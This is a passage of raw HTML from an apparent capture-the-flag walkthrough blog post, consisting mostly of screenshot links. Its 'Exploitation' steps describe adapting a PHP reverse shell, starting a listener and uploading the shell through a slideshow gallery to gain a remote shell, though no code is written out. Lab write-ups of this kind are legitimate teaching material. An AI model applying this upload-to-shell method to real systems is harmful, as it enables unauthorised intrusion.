class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgrL3lO-Imgkt6eQ7EnyDo7eWxiQUgVzW6si6O2CLLbVg7db-plDsIN_inOB_vcdNtcGkWB_e1vSvP9YozPCRGo9gulaHvPbXSFY0wB2Yuy60NDGgwNGCtHuGRRn5hUu7pV2c5BnxFnczT0-wUv3xQhT5tIL6KAhcx8x5irXXaterfICD5NfYxtle9XrQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;600&quot; data-original-width=&quot;513&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgrL3lO-Imgkt6eQ7EnyDo7eWxiQUgVzW6si6O2CLLbVg7db-plDsIN_inOB_vcdNtcGkWB_e1vSvP9YozPCRGo9gulaHvPbXSFY0wB2Yuy60NDGgwNGCtHuGRRn5hUu7pV2c5BnxFnczT0-wUv3xQhT5tIL6KAhcx8x5irXXaterfICD5NfYxtle9XrQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjfR_lQYoxEwplduvN2_Au9zBGpv_TgaK-ZXYVROcp_nN48J0dFZ5q6bGKpQwr5CZWYixVMBwMNikgvkVfJrw9Es2NelMi1AKRnjydqp6nXXpENUlIKBhM8rK1s8ru4vGy-yn2gIxgRqCySQryQ7bNIpPBIZeBBjkm3RfZWAVk-coFtWYgACW_zHPhYLw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;884&quot; data-original-width=&quot;824&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjfR_lQYoxEwplduvN2_Au9zBGpv_TgaK-ZXYVROcp_nN48J0dFZ5q6bGKpQwr5CZWYixVMBwMNikgvkVfJrw9Es2NelMi1AKRnjydqp6nXXpENUlIKBhM8rK1s8ru4vGy-yn2gIxgRqCySQryQ7bNIpPBIZeBBjkm3RfZWAVk-coFtWYgACW_zHPhYLw=w597-h640&quot; width=&quot;597&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;3 - EXPLOITATION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Copying locally &lt;b&gt;php-reverse-shell.php&lt;/b&gt;, renaming it to &lt;b&gt;myshell.php &lt;/b&gt;and adapting to our needs:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhSM9ECIiu2Z805VrgQ92KWUpEupUeedZ3IjphlxYsu899EappvUDHZTigirl0o-T0phoEhQ_MXAUYy8SWhATpuH0SO_XdOUSY0Jb6CCczyNtYdCKo-wQovOX1FHb0Nhy-RXAD2SHBs-mXiOvJxWqUvWTbBFku6yn36-AtgvJq7q0CmX-ijITKj1JuWFA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;621&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhSM9ECIiu2Z805VrgQ92KWUpEupUeedZ3IjphlxYsu899EappvUDHZTigirl0o-T0phoEhQ_MXAUYy8SWhATpuH0SO_XdOUSY0Jb6CCczyNtYdCKo-wQovOX1FHb0Nhy-RXAD2SHBs-mXiOvJxWqUvWTbBFku6yn36-AtgvJq7q0CmX-ijITKj1JuWFA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcZBDc6YmKjSn-fi6KKW8KWjIMYGRDrhZ3Qr7nHoxaYohcg9zezEFb19Wo7tfDLwoUVaksuhxKxP3mk6Gb2P5npGH2fi2KfZpwe6maNKP8hFocjk0vLkK3Uwo4_YR9KXLy0qyVDR2uSpxUoV7j6LnhY8tc7YrRPWlUlKQ4UvKv8zP60vNL9sVjrIqHfQ&quot; style=&quot;clear: left; display: inline !important; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;431&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcZBDc6YmKjSn-fi6KKW8KWjIMYGRDrhZ3Qr7nHoxaYohcg9zezEFb19Wo7tfDLwoUVaksuhxKxP3mk6Gb2P5npGH2fi2KfZpwe6maNKP8hFocjk0vLkK3Uwo4_YR9KXLy0qyVDR2uSpxUoV7j6LnhY8tc7YrRPWlUlKQ4UvKv8zP60vNL9sVjrIqHfQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Setting a listener session:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhPa6EkWyGtOP-fqb4BSDppochSqDWw_WA3mrC0DHDuOL1boKNPmKMzfnjRZJZRSglRdE3RlWdHSZW1CyYl-skzpkXbSwKn5BDrVvQ-pYI3U_KjlneIagG0cIG1PggPIG7uJA9lzLK3SFo0QWJRZ0Lt4YKgwJZNDLbnCkzWio1bxMc_H2yuOIMuDJzN7w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;80&quot; data-original-width=&quot;368&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhPa6EkWyGtOP-fqb4BSDppochSqDWw_WA3mrC0DHDuOL1boKNPmKMzfnjRZJZRSglRdE3RlWdHSZW1CyYl-skzpkXbSwKn5BDrVvQ-pYI3U_KjlneIagG0cIG1PggPIG7uJA9lzLK3SFo0QWJRZ0Lt4YKgwJZNDLbnCkzWio1bxMc_H2yuOIMuDJzN7w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, let&#39;s upload &lt;b&gt;myshell.php&lt;/b&gt; to &lt;b&gt;Slideshow&lt;/b&gt; gallery:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhWEinciphTeGTCLHXGmBCMXzMSks0TG_6N0U9-vku7mPBPa1x7ZcSZWab1mqvO7WEzjuAYzNR30cnnpMAB-KK5wc9ir8kBBL_jhrErRzfCdZd1Ox68-P4pEUc9jcZDCWd-N3rMGEhR5V-CT51fc8kMJ_-3Z1q47l_wszouK4HvKLvCul27q8YMzg13IA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;685&quot; data-original-width=&quot;926&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhWEinciphTeGTCLHXGmBCMXzMSks0TG_6N0U9-vku7mPBPa1x7ZcSZWab1mqvO7WEzjuAYzNR30cnnpMAB-KK5wc9ir8kBBL_jhrErRzfCdZd1Ox68-P4pEUc9jcZDCWd-N3rMGEhR5V-CT51fc8kMJ_-3Z1q47l_wszouK4HvKLvCul27q8YMzg13IA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghUM2JlPgD5G9DfEjkqccluv15_u16yQQCXlTEuA-TGMiycHXVqCE4hT6CjJ-SLpVP8iMXGNr-IswLUNb66b3E-o4wKaM1qlBeyKLPZbnH2jKnGP1Xh9rIwxa4OGweY5kTlD_Cg4-BhivcAZYXXew380Srhsm2mqp_pyM7OzkRid1qYFggN7-0H01-iA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;128&quot; data-original-width=&quot;487&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghUM2JlPgD5G9DfEjkqccluv15_u16yQQCXlTEuA-TGMiycHXVqCE4hT6CjJ-SLpVP8iMXGNr-IswLUNb66b3E-o4wKaM1qlBeyKLPZbnH2jKnGP1Xh9rIwxa4OGweY5kTlD_Cg4-BhivcAZYXXew380Srhsm2mqp_pyM7OzkRid1qYFggN7-0H01-iA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once we are sure that the upload has been successful let&#39;s &lt;b&gt;Save Slide&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgsFsPXs_56BmUBLciQZac1Mh8NXflutHjjLc4_6NCTB7RNzggNXw_CBx2SA1ygqLncTb1hZcsJp_PsVIDqJOmrGd5UypTnO-zhbGjiWOQZ0e7Oc8Lgcp3ud8vqBhYtz4b5q_sEJddJkEMKF3ChVJWfY4Um1nwVunZlfGjlWq5XERJJONkyl8mSV18eyQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;720&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgsFsPXs_56BmUBLciQZac1Mh8NXflutHjjLc4_6NCTB7RNzggNXw_CBx2SA1ygqLncTb1hZcsJp_PsVIDqJOmrGd5UypTnO-zhbGjiWOQZ0e7Oc8Lgcp3ud8vqBhYtz4b5q_sEJddJkEMKF3ChVJWfY4Um1nwVunZlfGjlWq5XERJJONkyl8mSV18eyQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- As a consequence a remote shell is triggered:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEintlx-UFne92hx_XAJ-no2a3swCAxk5y0xlOJSiE1A7qVWOw6D5Bi3hIgCQCPQI7DYfb3rngTpTzOomY9dY9VfXu-aoZD9gjRvp18Aljz6tbLZF_XF5Ha58SvGUp_ZPcIXrOpxzRzqffmz0T7MvkC46cogMK9FSsvgJCusG4ZtoN46O0o0-qeQM8RoLg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;247&quot; data-original-width=&quot;753&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEintlx-UFne92hx_XAJ-no2a3swCAxk5y0xlOJSiE1A7qVWOw6D5Bi3hIgCQCPQI7DYfb3rngTpTzOomY9dY9VfXu-aoZD9gjRvp18Aljz6tbLZF_XF5Ha58SvGUp_ZPcIXrOpxzRzqffmz0T7MvkC46cogMK9FSsvgJCusG4ZtoN46O0o0-qeQM8RoLg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- It seems to be two users &lt;b&gt;mrderp&lt;/b&gt; and s&lt;b&gt;tinky&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjYxRlBcpU9jF0ftusLmN0qU6mWXdiNXfIQQXqt-F39vBKtAsuIY3EJZdXZHk_f9GXG0YQaQJVjGD1Wb6G-rjne2TlndNEzmIFgQETC2FMsDbEdd0V1RP98GOoC1tlbo20O3_GGPCe1q0j8st3bGvGsf7ny1rI1IwzPKA6fhVIDCTfn3Stzl60NqN03jw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;162&quot; data-original-width=&quot;617&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjYxRlBcpU9jF0ftusLmN0qU6mWXdiNXfIQQXqt-F39vBKtAsuIY3EJZdXZHk_f9GXG0YQaQJVjGD1Wb6G-rjne2TlndNEzmIFgQETC2FMsDbEdd0V1RP98GOoC1tlbo20O3_GGPCe1q0j8st3bGvGsf7ny1rI1IwzPKA6fhVIDCTfn3Stzl60NqN03jw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhYekPgcBvKzcUCVrqJfiJ3EFymQyXI4ENGvrOMEh794S5qctNrUhr2iIlnziSJZ8xb2PZiXcKYM9klPdHVJHK4NxrBAYXCFIw361lRa6cCgpqFlHnei6oQoTLgNgBFDYEaaLYnyLElG4M-q1muKSWvKG-hXOVnz4yhc3yieXdC8QGCcaTRStCXOqlI7A&quot; style=&quot;clear: left; display: inline !important; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;21&quot; data-original-width=&quot;229&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhYekPgcBvKzcUCVrqJfiJ3EFymQyXI4ENGvrOMEh794S5qctNrUhr2iIlnziSJZ8xb2PZiXcKYM9klPdHVJHK4NxrBAYXCFIw361lRa6cCgpqFlHnei6oQoTLgNgBFDYEaaLYnyLElG4M-q1muKSWvKG-hXOVnz4yhc3yieXdC8QGCcaTRStCXOqlI7A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgnn8e1Ik-POXYKLGa1RshOwQ9aBT_uu13fbzuKABcvwfhdnHUFV4WAGgu0FUjgQ1HAXzPSlveuT0ftV2cEn7--dvnmCgTevbQaXgVphkWUiVBUWp6MYZtsibOkDwtismBhfJUJQLzVj5iGzIDXZUkQc6C6ZBvzNG21MZ0OuBewRe_O7lWzQrRVLd_nIw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;635&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgnn8e1Ik-POXYKLGa1RshOwQ9aBT_uu13fbzuKABcvwfhdnHUFV4WAGgu0FUjgQ1HAXzPSlveuT0ftV2cEn7--dvnmCgTevbQaXgVphkWUiVBUWp6MYZtsibOkDwtismBhfJUJQLzVj5iGzIDXZUkQc6C6ZBvzNG21MZ0OuBewRe_O7lWzQrRVLd_nIw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br 